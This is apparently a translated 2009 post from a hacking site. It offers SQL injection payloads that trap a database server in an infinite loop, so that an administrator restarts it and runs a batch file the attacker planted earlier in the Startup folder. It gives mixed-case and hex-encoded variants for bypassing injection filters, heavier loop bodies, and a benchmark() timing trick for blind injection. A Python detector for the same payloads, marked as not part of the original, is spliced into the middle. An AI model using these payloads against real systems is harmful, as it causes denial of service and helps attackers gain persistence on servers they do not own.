Let the administrator restart the server for you - Vulnerability Warnings - Black Bar Security Net

2009-06-14T00:00:00
ID MYHACK58:62200923576
Type myhack58
Reporter Anonymous
Modified 2009-06-14T00:00:00

Description

Source: dark group

Sometimes, after we have written a batch file into the Startup menu through a database backup, we want the server to run it on its next restart. But we wait and wait, and the server never restarts. What then? Let the administrator restart it for us.

The following injection code makes the database server stop responding, or respond very slowly. For the best effect, submit it at the injection point and run it a few more times. Eventually an administrator will restart the server.

Numeric injection points:

;wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd--

The text type of the injection point:

';wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd--

Or to Declare + the EXEC mode to perform:

;dEcLaRe @s vArChAr(8000) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--

';dEcLaRe @s vArChAr(8000) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--

The code above produces an infinite loop on the database server; the loop exhausts the server's resources and causes a denial of service. The administrator will then restart the server for you.

Note: The code above is offensive, please use it with caution. Note: select char(0) can be changed to select power(1.23456,100) to increase the amount of computation per iteration.
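As an added example (not part of the original post), here is a small Python normaliser of the kind a defender could run over request parameters or query logs: it folds case, decodes 0x hex literals the same way the DECLARE/EXEC variant above does before running them, and then flags a WHILE loop whose condition is built only from numeric literals, an EXEC of a hex-assembled string, and benchmark() calls. The payload strings it is checked against are the ones quoted on this page; the function and pattern names are my own.

```python
import re

# Matches a T-SQL/MySQL hex literal such as 0x7748694c...
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")
# WHILE whose condition uses only numeric literals and comparison operators,
# i.e. a condition that can never change (the "wHiLe 1<9" idiom on this page).
CONST_WHILE = re.compile(r"\bwhile\s+[\d\s.<>=!]+\bbegin\b(.*?)\bend\b", re.S)
# EXEC of a variable, as in the DECLARE @s ... EXEC(@s) variant.
EXEC_VAR = re.compile(r"\bexec(?:ute)?\s*\(\s*@\w+\s*\)")
# Functions a loop body may call purely to burn CPU.
HEAVY_FUNC = re.compile(r"\b(benchmark|power)\s*\(")

def decode_hex_literals(sql: str) -> str:
    """Replace each 0x... literal with the text it encodes (what SET @s=0x... then EXEC(@s) runs)."""
    def repl(m: re.Match) -> str:
        digits = m.group(1)
        if len(digits) % 2:          # odd length: not a byte string, leave it
            return m.group(0)
        return bytes.fromhex(digits).decode("latin-1")
    return HEX_LITERAL.sub(repl, sql)

def normalize(sql: str, max_rounds: int = 3) -> str:
    """Case-fold, collapse whitespace and decode hex until stable, so mixed-case and hex variants compare equal."""
    text = sql
    for _ in range(max_rounds):
        folded = re.sub(r"\s+", " ", decode_hex_literals(text)).lower()
        if folded == text:
            break
        text = folded
    return text

def analyze(sql: str) -> list[str]:
    """Return the DoS indicators found in one query or request parameter."""
    norm = normalize(sql)
    findings = []
    loop = CONST_WHILE.search(norm)
    if loop:
        findings.append("constant-condition WHILE loop")
        heavy = HEAVY_FUNC.search(loop.group(1))
        if heavy:
            findings.append(f"{heavy.group(1)}() inside loop body")
    if EXEC_VAR.search(norm) and HEX_LITERAL.search(sql):
        findings.append("EXEC of hex-assembled string")
    if re.search(r"\bbenchmark\s*\(", norm):
        findings.append("benchmark() call")
    return findings

if __name__ == "__main__":
    # Constructed sample: the mixed-case payload quoted on this page.
    print(analyze(";wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd--"))
```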

--------------------------------------------------

;wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd-- This statement means: while 1 is less than 9, select the character with ASCII code 0. Because the condition always holds, it is an infinite loop, and it runs until the machine's resources are exhausted. The mixed letter case is there to bypass the website's anti-injection filter.

;declare @s varchar(8000) set @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 exec(@s)-- declare @s varchar(8000) defines @s as a varchar of length 8000. The "wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd" is assigned to @s as a hex-encoded string value, and then exec runs it. Its purpose is also to bypass the website's anti-injection filter.

';wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd-- has a ' added because it is a character-type injection point.

Anyway, my explanation is unclear. select power(1.23456,100) returns 1.23456 to the 100th power; it would only not die when pigs fly. The concat function joins the series of strings inside it, with differences in case. benchmark(9999999999999,md5('test')) reports the elapsed run time to the client; it may be useful for blind injection. I don't know whether the concat function can be used to attack? w hex-encoded is 0x77, so benchmark(9999999999999,md5(0x77)) might be able to bypass anti-injection. Just scribbling; the experts can laugh at it.